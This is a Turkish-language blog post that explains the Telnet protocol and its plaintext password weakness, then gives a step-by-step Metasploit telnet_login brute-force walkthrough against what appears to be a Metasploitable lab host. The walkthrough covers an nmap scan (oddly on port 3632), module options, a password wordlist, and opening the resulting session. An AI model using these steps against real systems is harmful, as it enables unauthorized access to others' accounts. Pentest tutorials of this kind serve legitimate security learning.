Telnet Nedir? Telnet, Internet ağı üzerindeki çok kullanıcılı bir makineye uzaktaki başka bir makineden bağlanmak için geliştirilen bi...

Telnet | Bulletin Board Systems | 23/tcp | Pentesting

9/30/2017 0 Yorumlar



Telnet Nedir?

Telnet, Internet ağı üzerindeki çok kullanıcılı bir makineye uzaktaki başka bir makineden bağlanmak için geliştirilen bir TCP/IP protokolü ve bu işi yapan programlara verilen genel isimdir. Bağlanılan makineye girebilmek (login) için orada bir kullanıcı isminizin (username) ve bağlantının gerçekleşebilmesi için bir telnet erişim programınızın olması gereklidir. Fakat bazı kütüphane ve herkese açık telnet bazlı web servisleri, bağlantı sırasında kullanıcı ismi (numarası) istemeyebilirler; ya da, kullanıcı isim ve parola olarak ne yazmanız gerektiği bağlandığınızda otomatik olarak karşınıza çıkar. Telnet, BBS (Bulletin Board Systems) sistemlere internet üzerinden erişimde günümüzde yaygın olarak kullanılmaktadır. Telnet erişim programları, günümüzdeki işletim sistemlerinin çoğunda işletim sistemi ile birlikte gelmektedir. Çok kullanıcılı işletim sistemleri (UNIX ve VMS) genellikle kullanıcılara metin tabanlı bir arayüz sunar ve bu sistemlerde tüm işlemler klavye vasıtası ile komut isteminden (command prompt) gerçekleştirilir.

Telnet programı ile sanal sunucunuza (virtual server) bağlandığınızda, uzaktan UNIX işletim sistemine bağlanmış olursunuz. Bu, UNIX komutları yazabileceğiniz, programları çalıştırabileceğiniz, sanki makinenin karşısında oturuyormuş gibi web sitenizi düzenleyebileceğiniz anlamına gelir.

Telnet güvensiz bir protokoldür. Tüm veriler şifrelenmemiş olarak gönderilir. Bu yüzden telnet oturumundan, sniffer yardımıyla kolaylıkla önemli bilgilere ulaşılabilir.

Telnet protokolü kullanıcı adı (username) ve şifrenizi (password) bağlı bulunduğunuz ağda kolaylıkla görebilecek bir format olan PLAIN TEXT (düz metin) düzeninde göndermektedir. Bu kullanıcı isminizin ve şifrenizin ağı dinleyen herhangi biri tarafından kolaylıkla görülebileceği anlamına gelir. Eğer ağınızdaki herkese güveniyorsanız Telnet kullanmanızda bir sakınca yoktur. Fakat güvenlik hakkında en ufak bir endişeniz bile varsa, hesabınıza bağlanırken telnet kullanmamanız yararınıza olacaktır. Veri alışverişini şifreleyen uzaktan bağlantı protoklü olarak SSH’ı örnek verebiliriz. Kaynak: wikipedia

"nmap -sV -p 3632 192.168.198.129" -> nmap -serviceVersion -p <taranacak_port> <hedef_ip> şeklinde yazdık.



############################################################################################

"search telnet_login" -> Metasploit içerisinden bu adın geçtiği exploiti bulmak için arama yaptık.

"use exp_name" -> use komutuyla exploit’i kullanacağız.

auxiliary(telnet_login)"show options" -> Sisteme yapılacak deneme yanılma (brute force) saldırısının sisteme erişmesi için gerekli ayarlamaların neler olduğunu öğrenmek için bu komutu kullandık.



############################################################################################

auxiliary(telnet_login)"set RHOSTS" -> Hedef ip giriyoruz
auxiliary(telnet_login)"set USERNAME msfadmin" -> İşlemi kısa tutmak namına kullanıcı adını girdim, siz USER_FILE ’ı kullanarak kullanıcı adı için de wordlist oluşturup atak yapabilirsiniz, kullanıcı adını doğru yapıp sadece şifre kısmı için b/f yaptıracağım.
auxiliary(telnet_login)"set STOP_ON_SUCCES true" -> Atıyorum: 6. satırdaki şifre eşleşti, 7. satırdaki şifreyi denemeye devam etsin mi? Eğer etmesin istiyorsak STOP_ON_SUCCES yani başarılı olduğu anda durdur seçeneğinin değerini true olarak ayarlıyoruz.
auxiliary(telnet_login)"set PASS_FILE dosya_yolu(/root/Desktop/pwdlist.txt)" -> Şifrelerin olduğu wordlist ’i ayarlıyoruz
auxiliary(telnet_login)"exploit/run" -> iyip atağı başlatıyoruz.



############################################################################################

[+] 192.168.136.128 succes: ’username:password’ --> Eşleşen şifre böyle gözükür.



############################################################################################

auxiliary(telnet_login)"sessions" -> Sistemde oturumun açılıp açılmadığını görmek için bu komutu kullanıyoruz.
auxiliary(telnet_login)"sessions -i 1" -> Sistemde açılan oturumun kimlik numarası (id) ’sini -i parametresiyle belirliyoruz, ardından oturum açılıyor, işlem bundan ibaret.



############################################################################################

0 yorum: